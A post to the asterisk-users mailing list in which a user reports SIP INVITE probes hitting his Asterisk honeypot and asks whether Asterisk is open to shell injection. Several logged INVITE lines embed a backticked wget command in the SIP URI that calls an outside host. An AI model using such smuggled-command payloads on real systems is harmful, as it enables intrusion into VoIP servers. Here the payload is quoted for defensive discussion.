I haven't seen this sort of URI/shell attack prior to today but it looks interesting. Embedding a backtick in the URI with a wget that doesn't seem to do much to an empty file.
I'm guessing it is just a probe to see if they can send further embedded backtick shell commands to my Asterisk instance (by watching their weblogs @ 91.223.89.94) (This happens to be my "honeypot" that just accepts all calls and dumps them into one big Asterisk 10 beta ConfBridge :-) INVITE sip:00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@x.x.x.x SIP/2.0. INVITE sip:00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@x.x.x.x SIP/2.0. INVITE sip:00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@x.x.x.x SIP/2.0. INVITE sip:011123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@x.x.x.x SIP/2.0. INVITE sip:011123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@x.x.x.x SIP/2.0. INVITE sip:011123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@x.x.x.x SIP/2.0. Does Asterisk have shell injection weakness? Or perhaps this targets some other Asterisk config manager that is subject to injection via URI? Tom -- _____________________________________________________________________ -- Bandwidth and Colocation Provided by http://www.api-digital.com -- New to Asterisk? Join us for a live introductory webinar every Thurs: http://www.asterisk.org/hello asterisk-users mailing list To UNSUBSCRIBE or update options visit: http://lists.digium.com/mailman/listinfo/asterisk-users
